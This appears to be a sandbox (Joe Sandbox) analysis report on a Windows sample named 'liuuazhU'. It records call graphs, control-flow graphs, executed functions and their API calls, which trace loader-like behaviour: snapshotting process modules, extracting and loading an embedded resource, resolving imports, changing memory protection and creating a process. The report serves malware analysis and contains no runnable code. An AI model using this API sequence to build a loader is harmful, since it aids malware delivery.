21013ce7 45409->45410 45417 210138a4 45410->45417 45414 21013ce7 45413->45414 45415 210138a4 2 API calls 45414->45415 45416 21013d08 45415->45416 45416->45406 45418 210138af 45417->45418 45421 210149a4 45418->45421 45420 210152fe 45422 210149af 45421->45422 45423 21015ff7 45422->45423 45424 21015f9c 45422->45424 45428 21017812 45422->45428 45433 21017828 45422->45433 45423->45420 45424->45423 45438 21174ad1 45424->45438 45429 21017849 45428->45429 45430 2101786d 45429->45430 45442 210179c7 45429->45442 45446 210179d8 45429->45446 45430->45424 45434 21017849 45433->45434 45435 2101786d 45434->45435 45436 210179c7 GetModuleHandleW 45434->45436 45437 210179d8 GetModuleHandleW 45434->45437 45435->45424 45436->45435 45437->45435 45440 21174b01 45438->45440 45439 21174ee0 WaitMessage 45439->45440 45440->45439 45441 21174b8c 45440->45441 45443 210179d2 45442->45443 45444 21017a1e 45443->45444 45450 21015c44 45443->45450 45444->45430 45447 210179e5 45446->45447 45448 21015c44 GetModuleHandleW 45447->45448 45449 21017a1e 45447->45449 45448->45449 45449->45430 45451 21015c4f 45450->45451 45452 21017a90 45451->45452 45454 21015c78 45451->45454 45455 21015c83 45454->45455 45460 21015c88 45455->45460 45457 21017aff 45464 2101d2c8 45457->45464 45458 21017b39 45458->45452 45463 21015c93 45460->45463 45461 21019080 45461->45457 45462 21017828 GetModuleHandleW 45462->45461 45463->45461 45463->45462 45466 2101d2f9 45464->45466 45467 2101d345 45464->45467 45465 2101d305 45465->45458 45466->45465 45470 2101d531 45466->45470 45473 2101d540 45466->45473 45467->45458 45476 2101d581 45470->45476 45471 2101d54a 45471->45467 45474 2101d54a 45473->45474 45475 2101d581 GetModuleHandleW 45473->45475 45474->45467 45475->45474 45477 2101d5c4 45476->45477 45478 2101d5a1 45476->45478 45477->45471 45478->45477 45479 2101d7e5 GetModuleHandleW 45478->45479 45480 2101d824 45479->45480 45480->45471 45481 2019ebf0 45482 2019ec12 45481->45482 45483 2019ed26 45482->45483 45488 20185d18 45482->45488 45495 20186373 45482->45495 45501 20185f38 45482->45501 45509 20185d08 45482->45509 45489 20185d2f 45488->45489 45491 20185d2a 45488->45491 45490 20185fd1 LdrInitializeThunk 45489->45490 45489->45491 45494 2018600c 45490->45494 45491->45483 45492 201860cc 45492->45483 45493 201864b0 LdrInitializeThunk 45493->45492 45494->45492 45494->45493 45496 201861f2 45495->45496 45497 2018636b LdrInitializeThunk 45496->45497 45500 20185d18 2 API calls 45496->45500 45499 201864c8 45497->45499 45499->45483 45500->45496 45502 20185f69 LdrInitializeThunk 45501->45502 45508 2018600c 45502->45508 45504 201860cc 45504->45483 45505 2018636b LdrInitializeThunk 45505->45504 45507 20185d18 2 API calls 45507->45508 45508->45504 45508->45505 45508->45507 45511 20185d0d 45509->45511 45510 20185d2a 45510->45483 45511->45510 45512 20185fd1 LdrInitializeThunk 45511->45512 45517 2018600c 45512->45517 45513 201860cc 45513->45483 45514 2018636b LdrInitializeThunk 45514->45513 45516 20185d18 2 API calls 45516->45517 45517->45513 45517->45514 45517->45516 45518 2101f8f0 45519 2101f988 CreateWindowExW 45518->45519 45521 2101fac6 45519->45521 45521->45521 45522 1cfcf248 45523 1cfcf28c CloseHandle 45522->45523 45525 1cfcf2d8 45523->45525 45526 40cbf7 45527 40cc08 45526->45527 45570 40d534 HeapCreate 45527->45570 45532 40cc4c 45534 40cc50 45532->45534 45535 40cc58 __RTC_Initialize 45532->45535 45533 40cc46 45631 41087e 71 API calls 8 library calls 45533->45631 45632 40cbb4 62 API calls 3 library calls 45534->45632 45572 411a15 67 API calls 3 library calls 45535->45572 45537 40cc57 45537->45535 45539 40cc66 45540 40cc72 GetCommandLineA 45539->45540 45541 40cc6a 45539->45541 45573 412892 71 API calls 3 library calls 45540->45573 45633 40e79a 62 API calls 3 library calls 45541->45633 45544 40cc71 45544->45540 45545 40cc82 45634 4127d7 107 API calls 3 library calls 45545->45634 45547 40cc8c 45548 40cc90 45547->45548 45549 40cc98 45547->45549 45635 40e79a 62 API calls 3 library calls 45548->45635 45574 41255f 106 API calls 6 library calls 45549->45574 45552 40cc97 45552->45549 45553 40cc9d 45554 40cca1 45553->45554 45555 40cca9 45553->45555 45636 40e79a 62 API calls 3 library calls 45554->45636 45575 40e859 73 API calls 5 library calls 45555->45575 45558 40cca8 45558->45555 45559 40ccb0 45560 40ccb5 45559->45560 45561 40ccbc 45559->45561 45637 40e79a 62 API calls 3 library calls 45560->45637 45576 4019f0 OleInitialize 45561->45576 45564 40ccbb 45564->45561 45565 40ccd8 45566 40ccea 45565->45566 45638 40ea0a 62 API calls _doexit 45565->45638 45639 40ea36 62 API calls _doexit 45566->45639 45569 40ccef __fdopen 45571 40cc3a 45570->45571 45571->45533 45630 40cbb4 62 API calls 3 library calls 45571->45630 45572->45539 45573->45545 45574->45553 45575->45559 45577 401ab9 45576->45577 45640 40b99e 45577->45640 45579 401abf 45580 401acd GetCurrentProcessId CreateToolhelp32Snapshot Module32First 45579->45580 45606 402467 45579->45606 45581 401dc3 CloseHandle GetModuleHandleA 45580->45581 45588 401c55 45580->45588 45653 401650 45581->45653 45583 401e8b FindResourceA LoadResource LockResource SizeofResource 45655 40b84d 45583->45655 45587 401c9c CloseHandle 45587->45565 45588->45587 45593 401cf9 Module32Next 45588->45593 45589 401ecb _memset 45590 401efc SizeofResource 45589->45590 45591 401f1c 45590->45591 45592 401f5f 45590->45592 45591->45592 45711 401560 __VEC_memcpy __fptostr 45591->45711 45595 401f92 _memset 45592->45595 45712 401560 __VEC_memcpy __fptostr 45592->45712 45593->45581 45604 401d0f 45593->45604 45597 401fa2 FreeResource 45595->45597 45598 40b84d _malloc 62 API calls 45597->45598 45599 401fbb SizeofResource 45598->45599 45600 401fe5 _memset 45599->45600 45601 4020aa LoadLibraryA 45600->45601 45602 401650 45601->45602 45603 40216c GetProcAddress 45602->45603 45603->45606 45607 4021aa 45603->45607 45604->45587 45605 401dad Module32Next 45604->45605 45605->45581 45605->45604 45606->45565 45607->45606 45685 4018f0 45607->45685 45609 40243f 45609->45606 45713 40b6b5 62 API calls __fdopen 45609->45713 45611 4021f1 45611->45609 45697 401870 45611->45697 45613 402269 VariantInit 45614 401870 75 API calls 45613->45614 45615 40228b VariantInit 45614->45615 45616 4022a7 45615->45616 45617 4022d9 SafeArrayCreate SafeArrayAccessData 45616->45617 45702 40b350 45617->45702 45620 40232c 45621 402354 SafeArrayDestroy 45620->45621 45629 40235b 45620->45629 45621->45629 45622 402392 SafeArrayCreateVector 45623 4023a4 45622->45623 45624 4023bc VariantClear VariantClear 45623->45624 45704 4019a0 45624->45704 45627 40242e 45628 4019a0 65 API calls 45627->45628 45628->45609 45629->45622 45630->45533 45631->45532 45632->45537 45633->45544 45634->45547 45635->45552 45636->45558 45637->45564 45638->45566 45639->45569 45643 40b9aa __fdopen _strnlen 45640->45643 45641 40b9b8 45714 40bfc1 62 API calls __getptd_noexit 45641->45714 45643->45641 45645 40b9ec 45643->45645 45644 40b9bd 45715 40e744 6 API calls 2 library calls 45644->45715 45716 40d6e0 62 API calls 2 library calls 45645->45716 45648 40b9f3 45717 40b917 120 API calls 3 library calls 45648->45717 45650 40b9ff 45718 40ba18 LeaveCriticalSection _doexit 45650->45718 45651 40b9cd __fdopen 45651->45579 45654 4017cc ___crtGetEnvironmentStringsA 45653->45654 45654->45583 45656 40b900 45655->45656 45662 40b85f 45655->45662 45726 40d2e3 6 API calls __decode_pointer 45656->45726 45658 40b906 45727 40bfc1 62 API calls __getptd_noexit 45658->45727 45661 401ebf 45673 40af66 45661->45673 45662->45661 45665 40b8bc RtlAllocateHeap 45662->45665 45666 40b870 45662->45666 45668 40b8ec 45662->45668 45671 40b8f1 45662->45671 45722 40b7fe 62 API calls 4 library calls 45662->45722 45723 40d2e3 6 API calls __decode_pointer 45662->45723 45665->45662 45666->45662 45719 40ec4d 62 API calls 2 library calls 45666->45719 45720 40eaa2 62 API calls 7 library calls 45666->45720 45721 40e7ee GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 45666->45721 45724 40bfc1 62 API calls __getptd_noexit 45668->45724 45725 40bfc1 62 API calls __getptd_noexit 45671->45725 45674 40af70 45673->45674 45675 40b84d _malloc 62 API calls 45674->45675 45676 40af8a 45674->45676 45680 40af8c std::bad_alloc::bad_alloc 45674->45680 45728 40d2e3 6 API calls __decode_pointer 45674->45728 45675->45674 45676->45589 45678 40afb2 45730 40af49 62 API calls std::exception::exception 45678->45730 45680->45678 45729 40d2bd 73 API calls __cinit 45680->45729 45681 40afbc 45731 40cd39 RaiseException 45681->45731 45684 40afca 45686 401903 lstrlenA 45685->45686 45687 4018fc 45685->45687 45732 4017e0 45686->45732 45687->45611 45690 401940 GetLastError 45692 40194b MultiByteToWideChar 45690->45692 45693 40198d 45690->45693 45691 401996 45691->45611 45694 4017e0 77 API calls 45692->45694 45693->45691 45748 401030 GetLastError EntryPoint 45693->45748 45695 401970 MultiByteToWideChar 45694->45695 45695->45693 45698 40af66 74 API calls 45697->45698 45699 40187c 45698->45699 45700 401885 SysAllocString 45699->45700 45701 4018a4 45699->45701 45700->45701 45701->45613 45703 40231a SafeArrayUnaccessData 45702->45703 45703->45620 45705 4019aa InterlockedDecrement 45704->45705 45710 4019df VariantClear 45704->45710 45706 4019b8 45705->45706 45705->45710 45707 4019c2 SysFreeString 45706->45707 45708 4019c9 45706->45708 45706->45710 45707->45708 45752 40aec0 63 API calls __fdopen 45708->45752 45710->45627 45711->45591 45712->45595 45713->45606 45714->45644 45716->45648 45717->45650 45718->45651 45719->45666 45720->45666 45722->45662 45723->45662 45724->45671 45725->45661 45726->45658 45727->45661 45728->45674 45729->45678 45730->45681 45731->45684 45733 4017f3 45732->45733 45734 4017e9 EntryPoint 45732->45734 45735 401805 45733->45735 45736 4017fb EntryPoint 45733->45736 45734->45733 45737 401818 45735->45737 45738 40180e EntryPoint 45735->45738 45736->45735 45739 40183e 45737->45739 45746 401844 45737->45746 45749 40b783 72 API calls 4 library calls 45737->45749 45738->45737 45750 40b6b5 62 API calls __fdopen 45739->45750 45743 40186d MultiByteToWideChar 45743->45690 45743->45691 45744 40184e EntryPoint 45744->45746 45745 40182d 45745->45746 45747 401834 EntryPoint 45745->45747 45746->45743 45746->45744 45751 40b743 62 API calls 2 library calls 45746->45751 45747->45739 45749->45745 45750->45746 45751->45746 45752->45710 45753 2018b3e0 45754 2018b402 45753->45754 45755 20185f38 4 API calls 45754->45755 45756 2018b543 45754->45756 45755->45756 45372 2019e7c0 45373 2019e80d WaitForInputIdle 45372->45373 45375 2019e876 45373->45375 45376 1cfcee60 45378 1cfcee87 45376->45378 45380 1cfcef78 45378->45380 45381 1cfcefc1 VirtualProtect 45380->45381 45383 1cfcef56 45381->45383 45757 20186565 45758 20186573 45757->45758 45759 20185d18 2 API calls 45758->45759 45760 2018666d 45758->45760 45762 201869f1 45758->45762 45759->45762 45761 20185d18 2 API calls 45761->45762 45762->45760 45762->45761

                                                                                        Executed Functions

                                                                                        Function 004019F0 Relevance: 146.0, APIs: 34, Strings: 49, Instructions: 747comprocessCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 0 4019f0-401ac7 OleInitialize call 401650 call 40b99e 5 40248a-402496 0->5 6 401acd-401c4f GetCurrentProcessId CreateToolhelp32Snapshot Module32First 0->6 7 401dc3-401ed4 CloseHandle GetModuleHandleA call 401650 FindResourceA LoadResource LockResource SizeofResource call 40b84d call 40af66 6->7 8 401c55-401c6c call 401650 6->8 27 401ed6-401eed call 40ba30 7->27 28 401eef 7->28 14 401c73-401c77 8->14 16 401c93-401c95 14->16 17 401c79-401c7b 14->17 21 401c98-401c9a 16->21 19 401c7d-401c83 17->19 20 401c8f-401c91 17->20 19->16 23 401c85-401c8d 19->23 20->21 24 401cb0-401cce call 401650 21->24 25 401c9c-401caf CloseHandle 21->25 23->14 23->20 32 401cd0-401cd4 24->32 31 401ef3-401f1a call 401300 SizeofResource 27->31 28->31 41 401f1c-401f2f 31->41 42 401f5f-401f69 31->42 35 401cf0-401cf2 32->35 36 401cd6-401cd8 32->36 40 401cf5-401cf7 35->40 38 401cda-401ce0 36->38 39 401cec-401cee 36->39 38->35 45 401ce2-401cea 38->45 39->40 40->25 46 401cf9-401d09 Module32Next 40->46 47 401f33-401f5d call 401560 41->47 43 401f73-401f75 42->43 44 401f6b-401f72 42->44 49 401f92-4021a4 call 40ba30 FreeResource call 40b84d SizeofResource call 40ac60 call 40ba30 call 401650 LoadLibraryA call 401650 GetProcAddress 43->49 50 401f77-401f8d call 401560 43->50 44->43 45->32 45->39 46->7 51 401d0f 46->51 47->42 49->5 85 4021aa-4021c0 49->85 50->49 55 401d10-401d2e call 401650 51->55 61 401d30-401d34 55->61 63 401d50-401d52 61->63 64 401d36-401d38 61->64 67 401d55-401d57 63->67 65 401d3a-401d40 64->65 66 401d4c-401d4e 64->66 65->63 69 401d42-401d4a 65->69 66->67 67->25 70 401d5d-401d7b call 401650 67->70 69->61 69->66 77 401d80-401d84 70->77 79 401da0-401da2 77->79 80 401d86-401d88 77->80 84 401da5-401da7 79->84 82 401d8a-401d90 80->82 83 401d9c-401d9e 80->83 82->79 86 401d92-401d9a 82->86 83->84 84->25 87 401dad-401dbd Module32Next 84->87 89 4021c6-4021ca 85->89 90 40246a-402470 85->90 86->77 86->83 87->7 87->55 89->90 91 4021d0-402217 call 4018f0 89->91 92 402472-402475 90->92 93 40247a-402480 90->93 98 40221d-40223d 91->98 99 40244f-40245f 91->99 92->93 93->5 95 402482-402487 93->95 95->5 98->99 103 402243-402251 98->103 99->90 100 402461-402467 call 40b6b5 99->100 100->90 103->99 106 402257-4022b7 call 401870 VariantInit call 401870 VariantInit call 4018d0 103->106 114 4022c3-40232a call 4018d0 SafeArrayCreate SafeArrayAccessData call 40b350 SafeArrayUnaccessData 106->114 115 4022b9-4022be call 40ad90 106->115 122 402336-40234d call 4018d0 114->122 123 40232c-402331 call 40ad90 114->123 115->114 154 40234e call 1cf5d005 122->154 155 40234e call 1cf5d01d 122->155 123->122 127 402350-402352 128 402354-402355 SafeArrayDestroy 127->128 129 40235b-402361 127->129 128->129 130 402363-402368 call 40ad90 129->130 131 40236d-402375 129->131 130->131 132 402377-402379 131->132 133 40237b 131->133 135 40237d-40238f call 4018d0 132->135 133->135 152 402390 call 1cf5d005 135->152 153 402390 call 1cf5d01d 135->153 138 402392-4023a2 SafeArrayCreateVector 139 4023a4-4023a9 call 40ad90 138->139 140 4023ae-4023b4 138->140 139->140 142 4023b6-4023b8 140->142 143 4023ba 140->143 144 4023bc-402417 VariantClear * 2 call 4019a0 142->144 143->144 146 40241c-40242c VariantClear 144->146 147 402436-402445 call 4019a0 146->147 148 40242e-402433 146->148 147->99 151 402447-40244c 147->151 148->147 151->99 152->138 153->138 154->127 155->127
                                                                                        APIs
                                                                                        • OleInitialize.OLE32(00000000), ref: 004019FD
                                                                                        • _getenv.LIBCMT ref: 00401ABA
                                                                                        • GetCurrentProcessId.KERNEL32 ref: 00401ACD
                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
                                                                                        • Module32First.KERNEL32 ref: 00401C48
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000008,00000000), ref: 00401C9D
                                                                                        • Module32Next.KERNEL32(00000000,?), ref: 00401D02
                                                                                        • Module32Next.KERNEL32(00000000,?), ref: 00401DB6
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00401DC4
                                                                                        • GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
                                                                                        • FindResourceA.KERNEL32(00000000,00000000,00000008), ref: 00401E90
                                                                                        • LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
                                                                                        • LockResource.KERNEL32(00000000), ref: 00401EA7
                                                                                        • SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
                                                                                        • _malloc.LIBCMT ref: 00401EBA
                                                                                        • _memset.LIBCMT ref: 00401EDD
                                                                                        • SizeofResource.KERNEL32(00000000,?), ref: 00401F02
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3089721536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3089721536.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3089721536.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_400000_liuuazhU.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Resource$HandleModule32$CloseNextSizeof$CreateCurrentFindFirstInitializeLoadLockModuleProcessSnapshotToolhelp32_getenv_malloc_memset
                                                                                        • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
                                                                                        • API String ID: 1430744539-2962942730
                                                                                        • Opcode ID: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
                                                                                        • Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
                                                                                        • Opcode Fuzzy Hash: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
                                                                                        • Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B
                                                                                        Function 20D121F8 Relevance: 12.2, Strings: 9, Instructions: 908COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
                                                                                        • API String ID: 0-2735749406
                                                                                        • Opcode ID: e22abf4764bbbfc47d61a76d5f7a1e4c39c30659510167bce6eb00eee58f7624
                                                                                        • Instruction ID: 4f1e20b768e1ecb02ce65a3b6a59cee6120c7a4ae02e46e073dd8340fdca770a
                                                                                        • Opcode Fuzzy Hash: e22abf4764bbbfc47d61a76d5f7a1e4c39c30659510167bce6eb00eee58f7624
                                                                                        • Instruction Fuzzy Hash: CC823A30A01209DFCB05CFA8E984BAEBBF2BF48314F158559E4459B2A6DB35ED91CF50
                                                                                        Function 20D11420 Relevance: 8.5, Strings: 6, Instructions: 963COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (o^q$(o^q$(o^q$,bq$,bq$Hbq
                                                                                        • API String ID: 0-56095411
                                                                                        • Opcode ID: f25ad835d29d4466fd7568511560101568051b328763f6eb8bb068a09f0b995c
                                                                                        • Instruction ID: ee15529c46aeca00c4952b3103999551e01033d5e4ab35f7b07dda6f15380af1
                                                                                        • Opcode Fuzzy Hash: f25ad835d29d4466fd7568511560101568051b328763f6eb8bb068a09f0b995c
                                                                                        • Instruction Fuzzy Hash: E1828D74A012199FCB04CFA9D894A9EBBF6BF88300F248569E905EB361DF34DD85CB51
                                                                                        Function 20185F38 Relevance: 3.4, APIs: 2, Instructions: 374libraryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 2876 20185f38-20185f67 2877 20185f69 2876->2877 2878 20185f6e-20186007 LdrInitializeThunk 2876->2878 2877->2878 2880 201860a6-201860ac 2878->2880 2881 2018600c-2018601f 2880->2881 2882 201860b2-201860ca 2880->2882 2883 20186021 2881->2883 2884 20186026-20186077 2881->2884 2885 201860cc-201860d9 2882->2885 2886 201860de-201860f1 2882->2886 2883->2884 2901 20186079-20186087 2884->2901 2902 2018608a-2018609c 2884->2902 2887 201864c8-201865c5 2885->2887 2888 201860f8-20186114 2886->2888 2889 201860f3 2886->2889 2894 201865cd-201865d7 2887->2894 2895 201865c7-201865cc 2887->2895 2891 2018611b-2018615b 2888->2891 2892 20186116 2888->2892 2889->2888 2903 2018615d 2891->2903 2904 20186162-20186194 2891->2904 2892->2891 2895->2894 2901->2882 2905 2018609e 2902->2905 2906 201860a3 2902->2906 2903->2904 2909 2018619b-201861dd 2904->2909 2910 20186196 2904->2910 2905->2906 2906->2880 2912 201861df 2909->2912 2913 201861e4-201861ed 2909->2913 2910->2909 2912->2913 2914 2018644d-20186453 2913->2914 2915 20186459-2018646c 2914->2915 2916 201861f2-20186217 2914->2916 2919 2018646e 2915->2919 2920 20186473-2018648e 2915->2920 2917 20186219 2916->2917 2918 2018621e-20186255 2916->2918 2917->2918 2928 2018625c-201862aa 2918->2928 2929 20186257 2918->2929 2919->2920 2921 20186490 2920->2921 2922 20186495-201864a9 2920->2922 2921->2922 2926 201864ab 2922->2926 2927 201864b0-201864c6 LdrInitializeThunk 2922->2927 2926->2927 2927->2887 2932 201862ac-201862d1 2928->2932 2933 2018630e-20186321 2928->2933 2929->2928 2936 201862d8-20186306 2932->2936 2937 201862d3 2932->2937 2934 20186328-20186369 2933->2934 2935 20186323 2933->2935 2941 20186378-201863b0 2934->2941 2942 2018636b-2018636c 2934->2942 2935->2934 2936->2933 2937->2936 2943 201863b2 2941->2943 2944 201863b7-20186418 call 20185d18 2941->2944 2942->2915 2943->2944 2950 2018641a 2944->2950 2951 2018641f-20186443 2944->2951 2950->2951 2954 2018644a 2951->2954 2955 20186445 2951->2955 2954->2914 2955->2954
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3111887989.0000000020180000.00000040.00000800.00020000.00000000.sdmp, Offset: 20180000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20180000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: dda595a7f8cf34edbea367627197f2245003dd31ddb3d3fce7f00b834efabfc2
                                                                                        • Instruction ID: 21a9ea63ff19c75b125f23da7c4e9e4bdd28338e4df525cdf02145ed64e52320
                                                                                        • Opcode Fuzzy Hash: dda595a7f8cf34edbea367627197f2245003dd31ddb3d3fce7f00b834efabfc2
                                                                                        • Instruction Fuzzy Hash: EB02D574E01218CFDB54DFA9D884B9DBBB2BF88304F10D1A9E808AB355DB759A85CF50
                                                                                        Function 21174AD1 Relevance: 1.8, APIs: 1, Instructions: 329COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3113302494.0000000021170000.00000040.00000800.00020000.00000000.sdmp, Offset: 21170000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_21170000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6c458f057b224e86c3b26dab4fb6ae71f9d9d4da3c7e606e0b4b91fb24c7730a
                                                                                        • Instruction ID: ca8b3f60f121ece83787748020c6e088abb4d9187e04efed4c9fa3893df01803
                                                                                        • Opcode Fuzzy Hash: 6c458f057b224e86c3b26dab4fb6ae71f9d9d4da3c7e606e0b4b91fb24c7730a
                                                                                        • Instruction Fuzzy Hash: BCD14B30E00219CFEB05CFA9C889B9DBBF1BF45314F158558E409AB7A5DB74EA46CB81
                                                                                        Function 2019D2E8 Relevance: 1.8, APIs: 1, Instructions: 303processCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000020,00000000,00000000,00000000,2019D94A), ref: 2019E5F4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3111939596.0000000020190000.00000040.00000800.00020000.00000000.sdmp, Offset: 20190000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20190000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateProcess
                                                                                        • String ID:
                                                                                        • API String ID: 963392458-0
                                                                                        • Opcode ID: e27799ba7035788ad38726b2b831ad1770a37be69e77062749a90702173102cd
                                                                                        • Instruction ID: cf95c9c30dc27b354be0eb044c59687f053d5abbaac6cb5270adcd99da5c6085
                                                                                        • Opcode Fuzzy Hash: e27799ba7035788ad38726b2b831ad1770a37be69e77062749a90702173102cd
                                                                                        • Instruction Fuzzy Hash: C0C1AF74D00258DFDB50CFA9C980BDDBBF2BF49304F2491A9E518A7260EB74AA85CF45
                                                                                        Function 20185D18 Relevance: 1.8, APIs: 1, Instructions: 263libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3111887989.0000000020180000.00000040.00000800.00020000.00000000.sdmp, Offset: 20180000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20180000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: dc3ec80f55dddaf7d9c6817d3df566ae503156c37e5d972520214fd4c7173d84
                                                                                        • Instruction ID: 817046637dbb5988f12fe2191e9cd6f12933e7bd8389bffc4d089cdfd14a0f44
                                                                                        • Opcode Fuzzy Hash: dc3ec80f55dddaf7d9c6817d3df566ae503156c37e5d972520214fd4c7173d84
                                                                                        • Instruction Fuzzy Hash: 5991AC71E002198BDB18DFB9C95469EBAF3EF88314F208669D405AB395EB349F05CF91
                                                                                        Function 2019E7C0 Relevance: 1.6, APIs: 1, Instructions: 86COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • WaitForInputIdle.USER32(?,?), ref: 2019E864
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3111939596.0000000020190000.00000040.00000800.00020000.00000000.sdmp, Offset: 20190000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20190000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID: IdleInputWait
                                                                                        • String ID:
                                                                                        • API String ID: 2200289081-0
                                                                                        • Opcode ID: decade0bc771cfc75198a70f11478f667a098184a583d75221d607bb3772716e
                                                                                        • Instruction ID: b57a221cea3cd7af3e81b9e50dbe9ac6cb4041b27d23c88b23016d021e9341fa
                                                                                        • Opcode Fuzzy Hash: decade0bc771cfc75198a70f11478f667a098184a583d75221d607bb3772716e
                                                                                        • Instruction Fuzzy Hash: 113199B4D002589FDB14CFEACA84A9EFBF1BB4A300F20902AE408BB354D774A945CF54
                                                                                        Function 20D1E388 Relevance: .8, Instructions: 780COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 20e2e2e68a394ae18302b869f72b077e9a323ba80b968a590d9924c2a7d022e1
                                                                                        • Instruction ID: 531e6071431676c381140ba2decd2e6d025563f4945a8e5ffc25a961bdd2d051
                                                                                        • Opcode Fuzzy Hash: 20e2e2e68a394ae18302b869f72b077e9a323ba80b968a590d9924c2a7d022e1
                                                                                        • Instruction Fuzzy Hash: 5482BE74E052298FDB64DFA9D984BDDBBB2AB49300F1491E9E40DA7251EB349EC1CF40
                                                                                        Function 2018B3E0 Relevance: .3, Instructions: 343COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3111887989.0000000020180000.00000040.00000800.00020000.00000000.sdmp, Offset: 20180000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20180000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2771d1cbb5700b06cecba8dcb9ca8c987f4b7ba96d6ff1cc184acc38062b7c18
                                                                                        • Instruction ID: a6c981334f9045f6c97c99a43b3deb86c82ef7e17815198f4b2af252d3ab0ca2
                                                                                        • Opcode Fuzzy Hash: 2771d1cbb5700b06cecba8dcb9ca8c987f4b7ba96d6ff1cc184acc38062b7c18
                                                                                        • Instruction Fuzzy Hash: BB02AC74E01228CFEB64CFA5C994BDDBBB2BB98300F1080A9E509A7394DB755E85CF51
                                                                                        Function 2019EBF0 Relevance: .3, Instructions: 319COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3111939596.0000000020190000.00000040.00000800.00020000.00000000.sdmp, Offset: 20190000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
